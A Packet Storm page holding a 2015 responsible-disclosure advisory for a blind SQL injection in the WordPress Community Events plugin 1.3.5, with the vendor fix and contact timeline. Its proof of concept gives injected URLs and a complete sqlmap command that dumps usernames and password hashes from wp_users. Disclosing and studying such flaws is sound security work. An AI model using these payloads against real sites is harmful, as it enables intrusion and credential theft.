Twenty Year Anniversary

WordPress Community Events 1.3.5 SQL Injection

WordPress Community Events 1.3.5 SQL Injection
Posted Apr 20, 2015
Authored by Hannes Trunde

WordPress Community Events plugin version 1.3.5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2015-3313
MD5 | a4131a9874e62b588538f121de82c5f7

WordPress Community Events 1.3.5 SQL Injection

Change Mirror Download
=======================================================================
title: SQL Injection
product: WordPress Community Events Plugin
vulnerable version: 1.3.5 (and probably below)
fixed version: 1.4
CVE number: CVE-2015-3313
impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
homepage: https://wordpress.org/plugins/community-events/
found: 2015-01-07
by: Hannes Trunde

mail: hannes.trunde@gmail.com
twitter: @hannestrunde

=======================================================================


Plugin description:
-------------------
"The purpose of this plugin is to allow users to create a schedule of upcoming
events and display events for the next 7 days in an AJAX-driven box or
displaying a full list of upcoming events."

Source: https://wordpress.org/plugins/community-events/


Recommendation:
---------------
The author has provided a fixed plugin version which should be installed
immediately.


Vulnerability overview/description:
-----------------------------------
Because of insufficient input validation, a blind SQL injection attack can be
performed within the search function to obtain sensitive information from the
database. To exploit this vulnerability, there has to be at least one planned
event on the calendar.


Proof of concept:
-----------------
The following HTTP request to the Community Events full schedule returns the
event(s) planned in the specified year:
===============================================================================
http://www.site.com/?page_id=2&eventyear=2015 AND 1=1 )--&dateset=on&eventday=1
===============================================================================

The following HTTP request returns a blank page, thus confirming the blind SQL
injection vulnerability:
===============================================================================
http://www.site.com/?page_id=2&eventyear=2015 AND 1=0 )--&dateset=on&eventday=1
===============================================================================

Obtaining users and password hashes with sqlmap may look as follows (--string
parameter has to contain (part of) the name of the event, enabling sqlmap to
differentiate between true and false statements):
================================================================================
sqlmap -u "http://www.site.com/?page_id=2&eventyear=2015&dateset=on&eventday=1" -p "eventyear" --technique=B --dbms=mysql --suffix=")--" --string="Test" --sql-query="select user_login,user_pass from wp_users"
================================================================================


Contact timeline:
-----------------
2015-04-08: Contacting author via mail.
2015-04-09: Author replies and announces a fix within a week.
2015-04-12: Mail from author, stating that plugin has been updated.
2015-04-14: Posting information to the open source software security mailing
list: http://openwall.com/lists/oss-security/2015/04/14/5
2015-04-18: Release of security advisory.


Solution:
---------
Update to the most recent plugin version.


Workaround:
-----------
See solution.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    1 Files
  • 16
    Jul 16th
    21 Files
  • 17
    Jul 17th
    4 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close